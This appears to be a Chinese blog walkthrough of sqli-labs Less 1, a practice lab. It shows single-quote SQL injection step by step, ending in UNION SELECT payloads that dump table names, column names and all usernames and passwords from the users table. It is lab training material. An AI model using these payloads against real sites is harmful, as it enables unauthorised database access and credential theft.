【sqli-labs】Less 1——字符型注入(单引号)

最新推荐文章于 2023-06-11 20:11:56 发布
最新推荐文章于 2023-06-11 20:11:56 发布
阅读量124 收藏
点赞数
分类专栏: 靶场和漏洞练习 #sqli-labs 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_71801652/article/details/131116161
版权

打开第一关页面,可以看到提示输入id参数
在这里插入图片描述

输入任意数字,可查询出对应的数据
在这里插入图片描述
输入2,3均可查询出对应的数据,存在可变参数id,注入可能存在。
1、判断注入点及注入类型
id=1’ 加入单引号,页面报错
在这里插入图片描述
id=1" 加入双引号,页面正常
在这里插入图片描述
id=1’ and 1=1%23 页面正常
在这里插入图片描述
id=1’ and 1=2%23 页面异常或出错
在这里插入图片描述
确定注入点为id,注入类型为单引号字符型注入。
2、判断字段数
逐步采用二分法进行列数判断
直到order by 3时,页面正常
在这里插入图片描述

order by 4 页面报错
在这里插入图片描述

由此确定,字段数为3(介于正常与报错之间的正常值)。
3、判断回显位置
联合查询union select,这里注意要让前面的查询报错,这样页面在联合查询的情况下,会显示出后半部分查询出来的数据,如本题中在ID前面加个负号,因为id值不为负。这样前面出错的情况下,就可以查询出后面数据的回显位置。
在这里插入图片描述

确定回显位置为2,3。
4、爆数据库,版本,当前数据库用户等信息
在这里插入图片描述
用户:root@localhost
数据库:security
5、爆数据库中表名

id=-1' union select 1,user(),group_concat(table_name) from information_schema.tables where table_schema=database()%23

在这里插入图片描述

得到数据库中的表有:emails,referers,uagents,users
6、查询指定表users中的列名

id=-1' union select 1,user(),group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'%23

在这里插入图片描述

users表中的列名有id,username,password
7、查询users表中的数据

id=-1' union select 1,group_concat(username),group_concat(password) from users%23

在这里插入图片描述

至此,得到所有用户名和密码。

Coisini话不投机养乐多
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs/Less-1/基于单引号字符注入
m0_75178803的博客
04-16 102
字符和数字最大的一个区别在于,数字不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。2.猜解 SQL 查询语句中的字段数 order by x。(多行注释 至少存在俩处的注入 /**/常用来作为空格)(单行注释 注意与 url 中的#区分)(单行注释 注意为短线短线空格)1.判断是否存在注入注入是。3.确定显示的字段顺序。5.获取数据库中的表。6.获取表中的字段名。7.查询到账户的数据。
关于sql注入单引号的解决
mochenxue的博客
06-11 607
1. 这边我们采用java的String进行替换为\\",\\ 主要是用于标识这是单引号与前端传来的真正"进行区分,然后写入数据库中。2. 这里我写了一个StringUtil类进行符号的替换和解析。
理论篇8:SQL注入(字符注入和数字注入)
aiojay的博客
05-02 3036
SQL注入(字符注入和数字注入),Mysql中 int(3) 类的含义,判断MYSQL注入闭合方式:
sql注入——单引号注入sqli-labs-less1)
pluto_23的博客
07-22 4357
sql注入的基本步骤: 1.判断是否有注入(判断是否严格校验)——第一个要素 1)可控参数的改变能否影响页面显示结果 2)输入的sql语句是否能报错--能通过数据库的报错看到一些数据库的语句痕迹 3)输入的sql语句能否不报错——我们的语句可以成功闭合 2.判断是什么类注入 3.语句是否能够被恶意修改(如添加单引号,双引号等)——第二个要素 4.是否能够成功执行——第三个要素 5.获取我们想要的数据 数据库->表->字段->值 环境选择:sqli-l...
SQL注入攻击】Single quotes(单引号注入
sm1918451478的博客
10-20 1359
SQL注入攻击】GET-Error based-Single quotes-String(GET基于错误的单引号字符注入
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs(php7.3以上可运行)
01-29
sqli-labs提供了多种级别的SQL注入练习,适合初学者到高级安全专家。每个级别都设计了一个具有不同安全漏洞的Web应用,用户可以通过尝试注入SQL语句来解密问题,从而深入理解SQL注入的各种技术和防御策略。 三、PHP...
SQL注入中绕过 单引号 限制继续注入
10-29
我想不少人都看过一些关于SQL Injection针对SQL Server攻击的文章,都是因为变量过滤不足甚至没有过滤而构造畸形SQL语句注入
SQL 传入特殊符号 单引号 ' 导致的问题及解决办法
小圣_fighting的博客
12-19 9180
问题描述:       今天在写项目,传入一个string到sql中,作为条件进行判断。程序报错。跟踪后发现,字符串中带有单引号。 select * from POSData where Reseller='CS Int'l Inc.'//      以上SQL的条件中,CS Int'l Inc. 是一个整串,但是其中多了单引号后,sql报错。 解决方法如下: str
自动完成-SQL注入单引号
猿人奶爸的博客
11-21 2395
在做查询自动完成(Autocomplete)功能时,出现一个小bug。如下图所示:                          用微软拼音键入时,会有单引号将拼音间隔开(搜狗不会),当触发前端自动完成代码块时,会调用后台的查询语句,然而......下一秒报错: 这个错误很明显是sql语句语法错误引起的,我这里后端用的是字符串拼接方式生成sql语句,其中部分条件模糊查询语句如下: ...
sql宽字节注入,绕过单引号
weixin_34149796的博客
08-04 1721
参加下面: http://leapar.lofter.com/post/122a03_3028a9 http://huaidan.org/archives/2268.html   https://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html
Sqli-labs2-5单引号变形,双引号,双注入
Recar的博客
12-12 4305
第二题第二个就是整形的了第一个是字符串的整形与字符注入的区别!!!整形是不用单引号闭合的,不要后面注释直接 union联合查询就可以了~~ 接下来就可以继续向第一题那样测试了整不需要闭合就可以执行后面的语句,字符的则要闭合http://localhost:9096/sqli-labs/Less-2/?id=-1 union select 1,2,table_name from informat
sqli-labs-master第一关:基于错误的GET单引号字符注入
m_ing
05-07 441
前言:这几天时间就和大家一起研究sqli-labs-master,一起闯关。至于sqli-labs-master的环境搭建我这里就不演示了,可以参考https://blog.csdn.net/Litbai_zhang 的博客自行搭建。 首先来到第一关 http://192.168.89.131/sqli-labs-master/Less-1/ 都知道第一关是基于错误的get注入 先来了解什么...
sqli-labs-less1
最新发布
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值